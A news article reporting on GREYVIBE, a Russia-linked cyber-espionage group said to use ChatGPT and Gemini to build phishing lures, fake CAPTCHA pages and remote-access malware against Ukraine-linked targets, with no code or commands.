AI Raises GREYVIBE Threat Against Ukraine Arabian Post

(MENAFN- The Arabian Post) clearfix"> Russia-linked cyber operators tracked as GREYVIBE have used generative artificial intelligence tools including ChatGPT and Google Gemini to widen cyber-espionage operations against Ukraine-linked targets, signalling a shift in how lower-skilled threat groups can build lures, malware and infrastructure at speed.

The activity, active since at least August 2025, has targeted military, government, civilian and business-related organisations through phishing emails, fake verification pages, fraudulent websites and custom malware. The operators are assessed to be Russian-speaking, working largely within Moscow time, and focused on intelligence-gathering objectives tied to the war in Ukraine. Investigators have not linked the group definitively to a previously known hacking unit, leaving its exact command structure unclear.

GREYVIBE's significance lies less in elite technical capability than in its operational model. The group appears to have used large language models across several phases of its campaigns, from creating deceptive content and lure websites to developing obfuscators, loaders, backend infrastructure and post-compromise scripts. That pattern points to AI being embedded in the workflow rather than used as a one-off experiment.

The group has deployed several attack chains. One, known as PhantomMail, used spear-phishing emails containing links to malicious ZIP or RAR archives hosted on file-sharing services. Victims who opened the files saw decoy documents or error messages while malware executed in the background. Lures impersonated Ukraine-linked public bodies and critical sectors, including emergency, energy and communications entities.

Another route, PhantomClick, used fake CAPTCHA and ClickFix-style pages disguised as Zoom or civil-society websites. Victims were instructed in Ukrainian to run commands under the pretext of completing a Cloudflare-style security check, a tactic designed to make users infect their own systems while believing they were passing a routine verification step.

See also Dragon Whistle targets China campuses

GREYVIBE also ran a campaign using fraudulent adult-club websites aimed at Ukraine-linked users. These sites delivered FallSpy Android spyware and Windows malware known as PhantomRelay and LegionRelay. Later versions added live-call features capable of capturing audio and video through WebRTC. Separate fake charity websites themed around drones and support for Ukraine's armed forces shared infrastructure and tooling with the adult-club campaign, suggesting coordination across different lures.

The malware family used by GREYVIBE shows both ambition and uneven tradecraft. PhantomRelay is a PowerShell-based remote access tool that profiles infected machines and allows operators to run scripts and Windows commands. LegionRelay supports file enumeration, exfiltration, screenshots, browser data theft, Telegram and WhatsApp data collection and remote desktop setup. Several obfuscators and loaders associated with the group appear to have been developed with AI assistance.

Operational mistakes have shaped the assessment of GREYVIBE as a low-to-moderately sophisticated group. Indicators include design flaws in LegionRelay, development samples uploaded to public malware-scanning platforms, inconsistent operational security and traces suggesting links to the wider cybercrime ecosystem. The same PhantomRelay-related tooling has appeared in activity clusters beyond GREYVIBE, raising the possibility that the group includes current or former cybercriminal actors rather than a conventional state unit.

The Russia connection rests on a combination of language, timing, targets and objectives. Russian-language comments and administrative panels appeared in malware and backend artefacts. Operator machines were configured to Russian locale and UTC+3. Activity patterns matched Moscow working hours. The target set and intelligence-gathering focus aligned closely with Russian state interests, though investigators stopped short of classifying GREYVIBE as a confirmed state agency operation.

See also LeRobot flaw exposes robotics AI servers

The use of ChatGPT, Google Gemini and image-generation platforms shows how generative AI is changing the economics of cyber operations. Attackers can generate polished phishing material, build credible websites, translate or localise content, create scripts, troubleshoot code and refactor malware faster than before. This does not remove the need for technical knowledge, but it lowers the barrier for groups that lack deep in-house engineering skills.

For defenders, the case adds pressure to rethink detection methods that rely heavily on stable malware signatures or repeated infrastructure patterns. AI-assisted actors can rewrite code, refresh lures and alter components more frequently, making old clustering techniques less dependable. Attribution becomes harder when malware families are generated, modified or shared across criminal and state-aligned ecosystems.

GREYVIBE's campaigns also show how Ukraine remains a testing ground for cyber tactics that may later spread elsewhere. Mid-sized organisations, charities, civil-society groups and companies linked to geopolitically sensitive sectors face rising risk from actors that can scale deception without large technical teams. The same methods used against Ukraine-linked targets could be adapted for election interference, corporate espionage, sanctions evasion, financial theft or influence operations.

MENAFN30052026000152002308ID1111187173